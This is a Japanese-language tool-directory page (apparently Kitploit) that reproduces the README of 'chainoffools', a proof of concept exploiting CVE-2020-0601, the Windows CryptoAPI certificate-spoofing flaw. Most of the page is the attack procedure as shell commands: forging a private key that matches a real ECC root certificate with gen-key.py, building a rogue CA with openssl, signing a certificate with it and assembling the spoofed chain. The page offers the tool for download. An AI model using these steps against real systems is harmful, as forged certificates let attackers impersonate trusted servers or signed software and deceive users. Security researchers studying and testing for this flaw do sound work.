Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
chainoffools — CVE-2020-0601 の PoC | Kitploit
ツール/GitHubGitHub/kudelskisecurity/chainoffools
脆弱性分析コード分析エクスプロイト暗号化ペネトレーションテスト
GitHubkudelskisecurity/chainoffools

chainoffools

CVE-2020-0601 の PoC

リポジトリを見る
335813年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CryptoAPI

CVE-2020-0601: Windows CryptoAPI のなりすまし脆弱性の悪用。詳細はブログ記事をご覧ください。

必要条件のインストール

root@kitploit:~
pip install -U -r requirements.txt

証明書の生成はOpenSSLバージョン1.0.2uまでで動作します。

CA証明書

ここではUSERTrust ECC Certification Authorityを使用しましたが、P-384曲線で動作する任意のルート証明書で構いません。

ルート証明書の公開鍵に一致する秘密鍵を生成するために、スクリプトgen-key.py(Python 3.6以上で動作)を使用しました:

root@kitploit:~
$ ./gen-key.py RootCert.pem 

鍵は次のように表示できます:

root@kitploit:~
$ openssl ec -in p384-key-rogue.pem -text

次に、不正なCAを生成します:

root@kitploit:~
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

次に、以下の秘密鍵と証明書を生成します:

root@kitploit:~
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 

最後に、完全なチェーンを1つのファイルにまとめるために、CA証明書とサーバ証明書を連結します:

root@kitploit:~
cat client-cert.pem ca-rogue.pem > cert.pem
ツールをダウンロード